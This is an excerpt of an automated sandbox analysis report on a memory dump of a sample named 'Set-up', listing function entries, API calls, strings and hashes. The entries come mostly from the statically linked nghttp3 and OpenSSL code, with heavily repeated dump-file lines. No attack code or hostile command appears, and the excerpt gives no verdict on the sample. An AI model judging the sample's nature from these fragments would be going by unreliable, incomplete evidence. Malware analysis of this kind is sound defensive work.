                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _assert
                            • String ID: (size_t)(p - rbuf->last) == len$nghttp3_qpack.c
                            • API String ID: 1222420520-2159148421
                            • Opcode ID: 030a871c1df3a3752ab8ea266578e292c3f8869fc20d0422c09b37909dfeb443
                            • Instruction ID: 0f691d5242c0d3f9c94c21381da71c0e5b1f29a74db72c1bad1657f2c0db5298
                            • Opcode Fuzzy Hash: 030a871c1df3a3752ab8ea266578e292c3f8869fc20d0422c09b37909dfeb443
                            • Instruction Fuzzy Hash: CE411671B082045FE7099A28D85076AB7D2FFDA314F18C67CE889CB792E935DD058792
                            APIs
                            • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len,nghttp3_qpack.c,00000EB7,?,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 008B27D1
                            Strings
                            • nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len, xrefs: 008B27CC
                            • nghttp3_qpack.c, xrefs: 008B27C7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _assert
                            • String ID: nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len$nghttp3_qpack.c
                            • API String ID: 1222420520-645767172
                            • Opcode ID: 2954c2e144c9afbbbe4ad0dfd35e83ce3d876de6c9e0ef6847596cd63160b40c
                            • Instruction ID: fc275f6c4460f85fc8dd35d55f1691275f2f161e887ebac2cd4a89e9051b5f79
                            • Opcode Fuzzy Hash: 2954c2e144c9afbbbe4ad0dfd35e83ce3d876de6c9e0ef6847596cd63160b40c
                            • Instruction Fuzzy Hash: 1751C875A043048FD7049F2CD880B5AB7D6FB99314F09467CEC99DB392EA34DD058B56
                            APIs
                            • _time64.API-MS-WIN-CRT-TIME-L1-1-0(?,00000000,0087836A,?,?,0000012C,000000FF), ref: 009F49BA
                              • Part of subcall function 009B7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B7262
                              • Part of subcall function 009B7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B7285
                              • Part of subcall function 009B7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B72C5
                              • Part of subcall function 009B7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,009DBD91), ref: 009B72E8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: strcpystrlen$_time64
                            • String ID: OCSP_check_validity$crypto/ocsp/ocsp_cl.c
                            • API String ID: 3821555430-713967112
                            • Opcode ID: e988eb757e1ecf858efcde7f2d35bb9f55872d02c2d4047c435329f38ab93f53
                            • Instruction ID: ae1f9a166bbf6b0443ca8f57b352dd86f5e63d1c798c07949d321278dc0ad524
                            • Opcode Fuzzy Hash: e988eb757e1ecf858efcde7f2d35bb9f55872d02c2d4047c435329f38ab93f53
                            • Instruction Fuzzy Hash: A6412476F483157BDA106AA4ED43BAF77498FC4764F048538FE0C9B382E635E91487A2
                            APIs
                            • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E,?,?,?,?,?,?,?), ref: 008A468C
                            Strings
                            • tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 008A4687
                            • nghttp3_conn.c, xrefs: 008A4682
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _assert
                            • String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
                            • API String ID: 1222420520-4133914617
                            • Opcode ID: 7f030682d2a0f0abd83fd9557f122c430b8c59b5ef359f7c3ebfad4c8f8ac318
                            • Instruction ID: 3d9361a4f460d435150e670357872ac8e00ec1a1b9ab0ab447155139c922160d
                            • Opcode Fuzzy Hash: 7f030682d2a0f0abd83fd9557f122c430b8c59b5ef359f7c3ebfad4c8f8ac318
                            • Instruction Fuzzy Hash: EF31D3716002056BE6109A29EC85FABB7D8FFC7369F040539F959C3682E735E81487A2
                            APIs
                            • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E), ref: 008A44B7
                            Strings
                            • tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 008A44B2
                            • nghttp3_conn.c, xrefs: 008A44AD
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _assert
                            • String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
                            • API String ID: 1222420520-4133914617
                            • Opcode ID: 9616519b0cbe094a6071a0c1282656acbd5b8ab5d71fcda78e38e5c40b2488d1
                            • Instruction ID: 13db5e2310a988b925e71dd09cebe04570f4f075c9efa92b27aa217bad178373
                            • Opcode Fuzzy Hash: 9616519b0cbe094a6071a0c1282656acbd5b8ab5d71fcda78e38e5c40b2488d1
                            • Instruction Fuzzy Hash: 9121D072101601AFFB105A69DC01B97779AEFCA365F080474F918C65A2FB76D424C766
                            APIs
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00B7A161
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00B7A2D1
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00B7A3EC
                            • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00B7A499
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: memcpy
                            • String ID:
                            • API String ID: 3510742995-0
                            • Opcode ID: 95f9a4438f778e090c26c0c2a4d0c08762f6c9ac6020e2daae0d4e46e66598a5
                            • Instruction ID: be46c877e5aaa74e5ce72a99ee57066a2411ad547c021b6e03ac69cef7d0a735
                            • Opcode Fuzzy Hash: 95f9a4438f778e090c26c0c2a4d0c08762f6c9ac6020e2daae0d4e46e66598a5
                            • Instruction Fuzzy Hash: 3BC19B716042109FCB44DF28C8C8A5ABBE5FFC8314F5985ADE8699B396D771EC40CB86
                            APIs
                            • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i < len || offset == 0,nghttp3_stream.c,00000371,00000000,0087D7A7,?,?,0087D7A7), ref: 008A61CF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _assert
                            • String ID: i < len || offset == 0$nghttp3_stream.c
                            • API String ID: 1222420520-1528673747
                            • Opcode ID: c620db921fd06c95b14f64c131daf5b489ddd14a3548fe1aa16331c7ac790489
                            • Instruction ID: 1bb792c70cfc7f8a5cc1af85701e4e69090402f8fa3f58cd9c6bb5cc4ae82c56
                            • Opcode Fuzzy Hash: c620db921fd06c95b14f64c131daf5b489ddd14a3548fe1aa16331c7ac790489
                            • Instruction Fuzzy Hash: 3A1194755043049FE304EF69D888FA677E4FF89324F0904BDE949573A3E6306959CBA2
                            APIs
                            • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((blklen & 0xfu) == 0,nghttp3_balloc.c,00000022,008A88D3,00000010,?,?,00000000,008A9AE3,008AACDD,-00000010,?,?,?,00000000,?), ref: 008A873C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _assert
                            • String ID: (blklen & 0xfu) == 0$nghttp3_balloc.c
                            • API String ID: 1222420520-1502420682
                            • Opcode ID: 99c284952771b9e7606357c1ad769ba375c9a86bde170db324764a96b464ced0
                            • Instruction ID: 5aa452bcd39ac3bb0bb8f221169fcd875b492b97f613c24a75bd3dbd92275bde
                            • Opcode Fuzzy Hash: 99c284952771b9e7606357c1ad769ba375c9a86bde170db324764a96b464ced0
                            • Instruction Fuzzy Hash: BA11A179A49340AFD3129B24DC01B56BFB0FF53714F19849AE848EB293D7349C44C7A2
                            APIs
                            • _byteswap_uint64.API-MS-WIN-CRT-UTILITY-L1-1-0(FFFFFF3F,?,nghttp3_conv.c,0000003D,nghttp3_get_varint,008A5084,?,?), ref: 008A8A31
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _byteswap_uint64
                            • String ID: nghttp3_conv.c$nghttp3_get_varint
                            • API String ID: 1624361598-912089391
                            • Opcode ID: a8f8d806f81183d96309aac287d39e443fc633151ba169d368b3c53ea089892a
                            • Instruction ID: 0f3740e3c9e6d5c410b1a74a8af565047cec19cb4722239094a536f0aae57e3c
                            • Opcode Fuzzy Hash: a8f8d806f81183d96309aac287d39e443fc633151ba169d368b3c53ea089892a
                            • Instruction Fuzzy Hash: 50F02BB19001429BD708EF34DC4163DB791EB83322F4C82E1F068CA5D4DB74C981E721
                            APIs
                            • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(rcbuf->ref > 0,nghttp3_rcbuf.c,0000005E,008B0B2D,5308C483,00000000,008A4D9F,?,008A0EC8), ref: 008A0333
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _assert
                            • String ID: nghttp3_rcbuf.c$rcbuf->ref > 0
                            • API String ID: 1222420520-1879435254
                            • Opcode ID: 8f9ce18460cbc45a07dd0e66a20aea320f0d33c4760e5ee67ac6e2ca99cf5859
                            • Instruction ID: f980d19af9a402603cae84188b60e9f0de2320f7daa1e2f1bdd4d2e5635e86cd
                            • Opcode Fuzzy Hash: 8f9ce18460cbc45a07dd0e66a20aea320f0d33c4760e5ee67ac6e2ca99cf5859
                            • Instruction Fuzzy Hash: 03E0C9786006049FEE188B19D955A25B7A2FF8A722F98C198F40DCB7E2D731DC06DE51
                            APIs
                              • Part of subcall function 009D9F60: GetStdHandle.KERNEL32(000000F4), ref: 009D9F76
                              • Part of subcall function 009D9F60: GetFileType.KERNEL32(00000000), ref: 009D9F83
                              • Part of subcall function 009D9F60: WriteFile.KERNEL32(00000000,?,00000200,?,00000000), ref: 009D9FBB
                            • raise.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000016,009DD8B6,assertion failed: WITHIN_ARENA(ptr),crypto/mem_sec.c,000002E8,00000000,00000020,009DDF70,?,?,?,?,?,?,?,00000000), ref: 009DA18B
                            • _exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000003,?,009DD8B6,assertion failed: WITHIN_ARENA(ptr),crypto/mem_sec.c,000002E8,00000000,00000020,009DDF70,?,?,?,?,?,?,?), ref: 009DA195
                            Strings
                            • %s:%d: OpenSSL internal error: %s, xrefs: 009DA17C
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: File$HandleTypeWrite_exitraise
                            • String ID: %s:%d: OpenSSL internal error: %s
                            • API String ID: 2477291680-569889646
                            • Opcode ID: 8a78c8d87912cfb289dbc57f2f04325ec8c03f1c194cd885b66e483de4f81765
                            • Instruction ID: 66cf61b1e60696620e6c80f504fd380cb7069511da235119eca18f17b3f15443
                            • Opcode Fuzzy Hash: 8a78c8d87912cfb289dbc57f2f04325ec8c03f1c194cd885b66e483de4f81765
                            • Instruction Fuzzy Hash: 90C01272984346BBEB027F904C03B2AB5A5AF65700F485C6CB654141F3DB63D928E717
                            APIs
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,0080F9BB,00000000,00815F07,?,?,0080F9BB,?), ref: 00B84266
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,0080F9BB,00000000,00815F07,?,?,0080F9BB,?), ref: 00B8427A
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,0080F9BB,00000000,00815F07,?,?,0080F9BB,?), ref: 00B84285
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,0080F9BB,00000000,00815F07,?,?,0080F9BB,?), ref: 00B84290
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
